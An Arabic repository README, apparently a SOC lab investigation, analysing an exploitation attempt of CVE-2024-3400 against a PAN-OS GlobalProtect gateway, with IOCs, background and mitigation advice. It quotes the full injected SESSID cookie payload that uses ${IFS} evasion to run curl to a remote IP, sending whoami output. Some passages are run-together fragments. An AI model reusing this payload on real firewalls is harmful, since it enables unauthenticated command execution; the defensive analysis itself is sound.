
استراتيجيات الكشف والتحليل والاستجابة لمحاولات استغلال CVE-2024-3400 التي تستهدف بوابات GlobalProtect الخاصة بـ Palo Alto PAN-OS. تتضمن مؤشرات الاختراق (IOCs)، وأنماط الاستغلال، وإرشادات التخفيف.
استراتيجيات الكشف والتحليل والاستجابة لمحاولات استغلال CVE-2024-3400 التي تستهدف بوابات GlobalProtect في Palo Alto PAN-OS. يتضمن مؤشرات الاختراق (IOCs) وأنماط الاستغلال وإرشادات التخفيف.
يحتوي هذا المستودع على تحقيق مفصل وتحليل تهديدات لـ CVE-2024-3400، وهي ثغرة حرجة في حقن الأوامر بدون مصادقة تؤثر على برنامج Palo Alto Networks PAN-OS، وتستهدف تحديدًا بوابة GlobalProtect.
في 18 أبريل 2024، تم اكتشاف نشاط استغلال ضد جدار حماية PAN-OS داخلي عبر نقطة النهاية الضعيفة /global-protect/login.esp. استخدم المهاجم ملف تعريف ارتباط SESSID معدًا يحتوي على أمر curl يتم تنفيذه عبر علامة backtick للوصول إلى خادم C2 بعيد مستضاف على 144.172.79.92 (ميامي، فلوريدا). استغلت الحمولة الضارة ${IFS} لتجاوز عوامل التصفية البسيطة واستخدمت دليل القياس عن بُعد (telemetry) في PAN-OS لترتيب النشاط الضار. استجاب جدار الحماية برمز 200 OK، مما يشير إلى أن الحمولة نُفذت بنجاح على الأرجح.

معرّف الحدث: 249
قاعدة الكشف: SOC274 – استغلال حقن الأوامر في PAN-OS
وقت الحدث: 18 أبريل 2024، الساعة 03:09 صباحًا بالتوقيت العالمي المنسق (UTC)
اسم المضيف: PA-Firewall-01
عنوان IP الوجهة: 172.16.17.139
عنوان IP المصدر: 144.172.79.92
طريقة الطلب: POST
نقطة النهاية: /global-protect/login.esp
حمولة ملف تعريف الارتباط: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
التجزئات الضارة:
SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5: 0c1554888ce9ed0da1583dbdf7b31651
: (تم تنفيذه باستخدام )





SESSID لحقن الأوامر${IFS} للمراوغة/opt/panlogs/tmp/device_telemetrydt_send بعد الاستغلال4444


10.2.9-h1 أو 11.0.4-h1 أو 11.1.2-h3144.172.79.92logs/: سجلات الكشف الأولية والمحللةioc/: تجزئات الملفات وعناوين IP المرتبطة بالهجومanalysis/: تعمق في سلوك الاستغلال وتتبع العملياتreport/: ملخص وصور للسجلات والأكواد من تحقيقاتييشير CVE-2024-3400 إلى ثغرة حرجة في Palo Alto Networks PAN-OS، وتؤثر تحديدًا على بوابات GlobalProtect. إليك تفصيل لما هو معروف علنًا عنها:
درجة CVSS: 10.0 (حرجة)
تاريخ النشر: أبريل 2024
المنتجات المتأثرة: PAN-OS 10.2 و11.0 و11.1 عند تفعيل GlobalProtect.
الاستغلال: مؤكد في البرية (يوم صفري)
نوع الثغرة: حقن أوامر بدون مصادقة
تسمح CVE-2024-3400 للمهاجمين غير المصادقين بتنفيذ أوامر عشوائية على نظام تشغيل جدار الحماية. وهذا يمنحهم فعليًا سيطرة كاملة على الأجهزة المتأثرة دون الحاجة إلى بيانات اعتماد — وهي نقطة اختراق خطيرة لأي مؤسسة تعتمد على جدران حماية Palo Alto.
يجب تفعيل بوابة GlobalProtect.
إصدارات محددة من PAN-OS (10.2.x، 11.0.x، 11.1.x).
قابلة للاستغلال عبر الإنترنت إذا لم تكن خلف طبقات حماية إضافية.
إرسال طلبات مصممة لاستغلال ثغرة الحقن.
نشر قذائف بعيدة أو تنزيل حمولات من المرحلة الثانية.
السلوك المرصود يشمل:
تنفيذ أوامر عبر عناوين URL مصممة
آليات استمرارية
تنقل جانبي داخل الشبكات
التحديث فورًا: أصدرت Palo Alto إصلاحات؛ قم بالترقية إلى الإصدارات غير المتأثرة (مثل 10.2.9-h1 أو 11.0.4-h1 أو 11.1.2-h3 أو أحدث).
التحقق من مؤشرات الاختراق (IOCs) مثل العمليات المشبوهة أو الاتصالات الصادرة أو سجل أوامر CLI غير المعتاد.
استخدام أدوات مثل Shodan أو جرد الأصول للعثور على الأجهزة المعرضة للخطر.
البحث عن عناوين IP خارجية تصل إلى GlobalProtect دون مصادقة صالحة.
التحقق من تنفيذ أوامر مشبوهة في السجلات (show system processes، cat /etc/passwd، وغيرها).
مراقبة سلوك جدار الحماية والتنبيه على الاتصالات الصادرة الشاذة.
يعمل هذا المستودع كتقرير تحقيق داخلي وكمورد تعليمي للمدافعين الراغبين في فهم الاستغلال الواقعي لثغرات PAN-OS. المساهمات والملاحظات الإضافية مرحب بها.
update.py/usr/bin/python3